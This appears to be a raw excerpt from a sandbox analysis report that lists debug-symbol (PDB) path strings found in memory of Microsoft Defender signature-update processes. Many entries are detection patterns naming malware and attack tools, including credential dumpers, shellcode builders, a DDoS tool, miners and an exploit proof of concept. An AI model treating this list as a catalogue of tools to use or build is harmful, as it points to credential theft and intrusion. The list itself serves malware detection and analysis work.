Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 0000000B.00000003.18306579283.0000021B5E6D2000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: 6E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb~ source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RegCleaner\bin\Release\PCCleaningUtility.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: MpAdlElvtStub.pdb source: mpam-728dfe11.exe, 00000011.00000002.19890272832.00007FF74001F000.00000002.00020000.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: irprops.pdbj source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: ConfigSecurityPolicy.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18590234890.0000027770036000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PicoTorrent.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \AppSync.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \Minoral.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: msiexec.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdb source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: MpUxAgent.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18586235407.0000027770034000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: dsget.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-registry-l1-1-0.pdbM8 source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: enumst\release\enumst.pdb] source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: (setup\odbcconf\exe\obj\i386\odbcconf.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: ZohoTray.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: .+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp
Source: Binary string: version.pdb@SH source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: release\wrapperex.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: ?\UltraCam\Src\UltraMap\AtTool\AtTool\obj\x64\Release\AtTool.pdba^ source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: PCHunter64.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb0 source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp
Source: Binary string: -\CVE-2019-0803201992\x64\Release\poc_test.pdba source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdbx source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: blinkopt.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PrivacyMaster\bin\Release\PCPrivacyShield.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbx source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: ntoskrnl.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: MpAdlStub.pdbGCTL source: mpam-796ed98e.exe, 0000000A.00000000.18177888205.00007FF69C51F000.00000002.00020000.sdmp
Source: Binary string: c:.+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: feclient.pdb source: MpSigStub.exe, 0000000B.00000003.18300370279.0000021B5E6B0000.00000004.00000001.sdmp
Source: Binary string: D:\\C\+\+\\.*ShellCode\\Release\\.*ShellCode.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
